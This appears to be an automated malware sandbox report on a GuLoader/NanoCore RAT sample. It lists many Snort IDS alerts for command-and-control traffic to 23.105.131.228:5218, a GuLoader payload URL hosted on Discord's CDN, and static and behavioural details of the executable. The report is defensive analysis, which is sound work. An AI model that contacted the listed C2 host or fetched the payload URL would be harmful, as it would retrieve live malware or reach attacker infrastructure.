      Source Port:49831
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978352182816766 05/26/22-22:56:59.419988
      SID:2816766
      Source Port:49783
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980152182816766 05/26/22-22:58:15.568079
      SID:2816766
      Source Port:49801
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980252182025019 05/26/22-22:58:20.166592
      SID:2025019
      Source Port:49802
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983552182025019 05/26/22-23:01:31.090286
      SID:2025019
      Source Port:49835
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284976852182025019 05/26/22-22:56:19.837362
      SID:2025019
      Source Port:49768
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982552182025019 05/26/22-23:00:29.822547
      SID:2025019
      Source Port:49825
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978852182025019 05/26/22-22:57:24.224475
      SID:2025019
      Source Port:49788
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986152182025019 05/26/22-23:03:45.715402
      SID:2025019
      Source Port:49861
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284978652182816766 05/26/22-22:57:12.301059
      SID:2816766
      Source Port:49786
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979652182816766 05/26/22-22:57:51.224317
      SID:2816766
      Source Port:49796
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981252182025019 05/26/22-22:59:16.016167
      SID:2025019
      Source Port:49812
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982052182816766 05/26/22-23:00:00.809134
      SID:2816766
      Source Port:49820
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981552182025019 05/26/22-22:59:34.423976
      SID:2025019
      Source Port:49815
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982252182025019 05/26/22-23:00:11.334940
      SID:2025019
      Source Port:49822
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983252182025019 05/26/22-23:01:12.735332
      SID:2025019
      Source Port:49832
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981052182816766 05/26/22-22:59:05.241226
      SID:2816766
      Source Port:49810
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984252182025019 05/26/22-23:02:08.123445
      SID:2025019
      Source Port:49842
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980052182816766 05/26/22-22:58:10.847781
      SID:2816766
      Source Port:49800
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284986252182025019 05/26/22-23:03:51.787396
      SID:2025019
      Source Port:49862
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982452182025019 05/26/22-23:00:23.686878
      SID:2025019
      Source Port:49824
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284985252182025019 05/26/22-23:02:50.506570
      SID:2025019
      Source Port:49852
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284981452182025019 05/26/22-22:59:28.246171
      SID:2025019
      Source Port:49814
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284980452182025019 05/26/22-22:58:32.441375
      SID:2025019
      Source Port:49804
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284979952182025019 05/26/22-22:58:02.999718
      SID:2025019
      Source Port:49799
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284982352182025019 05/26/22-23:00:17.588964
      SID:2025019
      Source Port:49823
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:23.105.131.228192.168.11.205218498292810290 05/26/22-23:00:54.737638
      SID:2810290
      Source Port:5218
      Destination Port:49829
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284983352182025019 05/26/22-23:01:18.862946
      SID:2025019
      Source Port:49833
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284984352182025019 05/26/22-23:02:14.277580
      SID:2025019
      Source Port:49843
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2023.105.131.2284977552182816766 05/26/22-22:56:40.578439
      SID:2816766
      Source Port:49775
      Destination Port:5218
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: 00000004.00000000.213653060266.0000000000630000.00000040.00000400.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://cdn.discordapp.com/attachments/963535165500588126/979423160845869128/nanoexp_bWgaxBaEn43.bin"}
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exeVirustotal: Detection: 10%Perma Link
      Source: Lib.Platform.Windows.Native.dll.2.drBinary or memory string: -----BEGIN PUBLIC KEY-----
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IndianerhvdingJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
      Source: unknownHTTPS traffic detected: 162.159.129.233:443 -> 192.168.11.20:49767 version: TLS 1.2
      Source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: C:\Builds\219\N2\HO_NMDllHost_g_2016_r_0\Sources\NMDllHost_2016\src\NMDllHost\NMDllHost\x86\Release\NMDllHost.pdb source: NMDllHost.exe.2.dr
      Source: Binary string: F:\APPS8.0.0.85\sw\src\apps\acapi\acapi___Win32_Release_Unicode\athcfg20U.pdb source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmp, athcfg20U.dll.2.dr
      Source: Binary string: System.Net.Http.pdb source: System.Net.Http.dll.2.dr
      Source: Binary string: F:\APPS8.0.0.85\sw\src\apps\acapi\acapi___Win32_Release_Unicode\athcfg20U.pdbeSuppTypeVendorACAPI.initGlobalResources failed: %s source: SecuriteInfo.com.W32.AIDetect.malware2.23037.exe, 00000002.00000002.213831352269.000000000040A000.00000004.00000001.01000000.00000003.sdmp
      Source: Binary string: d:\Projects\AirVPN\Repo\eddie-air\src\Lib.Platform.Windows.Native\bin\x64\Release\Lib.Platform.Windows.Native.pdb source: Lib.Platform.Windows.Native.dll.2.dr
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405C49
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_00406873 FindFirstFileW,FindClose,2_2_00406873
      Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.23037.exeCode function: 2_2_0040290B FindFirstFileW,2_2_0040290B
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\06e54f5fa1f15dd558eaf403cdcacad3\System.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\5085e86702d2182b0d9417971c65ded2\System.Drawing.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\ae952be8fa59744d6333aed90b72f162\System.Windows.Forms.ni.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\Microsoft.NET\Jump to behavior

      Networking

      barindex
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49768 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49768 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49769 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49769 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49771 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49771 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49775 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49775 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49780 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49780 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49782 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49782 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49783 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49783 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49783 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49784 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49784 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49786 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49786 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49787 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49787 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49788 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49788 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 23.105.131.228:5218 -> 192.168.11.20:49788
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49790 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49790 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49791 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49791 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49792 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49792 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49796 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49796 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49797 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49797 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49799 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49799 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49800 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49800 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49801 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2841753 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon (Inbound) 23.105.131.228:5218 -> 192.168.11.20:49801
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49801 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49802 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49802 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49802 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49803 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49803 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49804 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49804 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49806 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49806 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49807 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49807 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49808 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49808 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49809 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49809 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49810 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49810 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49811 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49811 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49812 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49812 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49813 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49813 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49814 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49814 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49815 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49815 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49816 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49816 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49817 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49817 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49819 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49819 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49820 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49820 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49821 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49821 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49822 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49822 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49823 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49823 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49824 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49824 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49825 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49825 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49826 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49826 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49827 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49827 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49828 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49828 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49829 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49829 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 23.105.131.228:5218 -> 192.168.11.20:49829
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49830 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49830 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49831 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49831 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49832 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49832 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49833 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49833 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49834 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49834 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49835 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49835 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49835 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49836 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49836 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49837 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49837 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49838 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49838 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49839 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49839 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49840 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49840 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49842 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49842 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49843 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49843 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816718 ETPRO TROJAN NanoCore RAT Keep-Alive Beacon 192.168.11.20:49843 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49844 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49844 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49845 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49845 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49846 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49846 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49847 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49847 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49848 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49848 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49852 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49852 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49853 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49853 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2810290 ETPRO TROJAN NanoCore RAT Keepalive Response 1 23.105.131.228:5218 -> 192.168.11.20:49853
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49854 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49854 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49855 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49855 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49856 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49856 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.11.20:49857 -> 23.105.131.228:5218
      Source: TrafficSnort IDS: 2816766 ETPRO TROJAN NanoCore RAT CnC 7 192.168.11.20:49857 -> 23.105.131.228:5218
